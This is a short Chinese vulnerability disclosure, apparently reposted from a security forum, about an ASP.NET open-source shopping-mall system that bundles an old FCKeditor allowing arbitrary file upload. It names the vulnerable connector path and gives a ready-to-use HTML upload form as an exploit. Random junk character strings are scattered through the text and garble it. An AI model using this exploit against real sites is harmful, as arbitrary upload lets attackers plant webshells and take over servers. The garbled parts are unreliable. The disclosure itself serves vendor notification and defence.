披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中; `/ _7 O M0 k) t# l# ]
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开; D9 }4 W/ n" f
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
. A b! W3 }; ]1 Y# {4 x4 p8 \. A 详细说明:其他版本我没测试,估计也是一样的问题
! b5 Q$ k4 H2 x* G) L' l) ^8 j http://127.0.0.1/controls/fckedi ... aspx/connector.aspx
5 K* X/ x! i. I) @- j0 m2 P 跳转到网站根目录上传任意文件。
! c: Z6 H" [0 Z( t! r! W: h* B5 W2 ` 漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件& j0 D" T6 x: t. t- ?. ^+ s
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">: W0 }8 [9 F+ |' _6 ?' i
Upload a new file:<br>
2 M+ \1 R( _* E) j& N) G; ^0 w <input type="file" name="NewFile" size="50"><br>; Q# i b6 R* n& S8 J
<input id="btnUpload" type="submit" value="Upload">* s m3 c1 A2 S1 L
</form> |